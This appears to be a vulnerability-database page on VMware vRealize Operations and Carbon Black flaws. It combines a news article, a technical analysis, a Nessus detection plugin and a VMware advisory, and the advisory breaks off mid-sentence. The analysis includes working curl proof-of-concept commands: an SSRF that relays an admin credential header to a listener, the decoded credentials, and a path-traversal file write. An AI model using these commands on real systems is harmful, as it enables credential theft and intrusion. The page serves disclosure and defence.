DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:4640BEB83FE3611B6867B05878F52F0D", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "description": "[](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-04-07T08:03:00", "modified": "2021-04-07T09:38:17", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 8.5}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 9.2, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "immutableFields": [], "lastseen": "2022-05-09T12:38:23", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0234", "CPAI-2021-1066", "CPAI-2022-0230"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"]}, {"type": "githubexploit", "idList": ["1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "35114B1B-006F-5732-8E42-9E8643B61C2A", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "D5702470-2A4B-5116-9B9F-4001BDD6935C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-"]}, {"type": "nessus", "idList": ["VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162349"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF"]}, {"type": "seebug", "idList": ["SSV:99173", "SSV:99174"]}, {"type": "thn", "idList": ["THN:868A288940CAEB61BD09AB7B818AD160"]}, {"type": "threatpost", "idList": ["THREATPOST:6C1025257B798335D913F95B63229B76", "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668"]}, {"type": "vmware", "idList": ["VMSA-2021-0004.1", "VMSA-2021-0004.2", "VMSA-2021-0005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36160"]}]}, "score": {"value": 1.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0234"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"]}, {"type": "githubexploit", "idList": ["1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "35114B1B-006F-5732-8E42-9E8643B61C2A", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "D5702470-2A4B-5116-9B9F-4001BDD6935C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/VMWARE_VROPS_MGR_SSRF_RCE/"]}, {"type": "nessus", "idList": ["VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162349"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF"]}, {"type": "seebug", "idList": ["SSV:99173", "SSV:99174"]}, {"type": "thn", "idList": ["THN:868A288940CAEB61BD09AB7B818AD160"]}, {"type": "threatpost", "idList": ["THREATPOST:6C1025257B798335D913F95B63229B76", "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668"]}, {"type": "vmware", "idList": ["VMSA-2021-0005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36160"]}]}, "exploitation": null, "vulnersScore": 1.1}, "_state": {"dependencies": 1660004461, "score": 1659897207}, "_internal": {"score_hash": "904278b744f07c1517be498021c10206"}}

{"seebug": [{"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, leading to a partially controlled SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF\u548c\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-21975 CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-07-24T15:47:15", "description": "", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager \u4efb\u610f\u6587\u4ef6\u5199\u5165\u6f0f\u6d1e\uff08CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99174", "href": "https://www.seebug.org/vuldb/ssvid-99174", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:44:35", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n**Notes**\n\n[1] The hotfixes 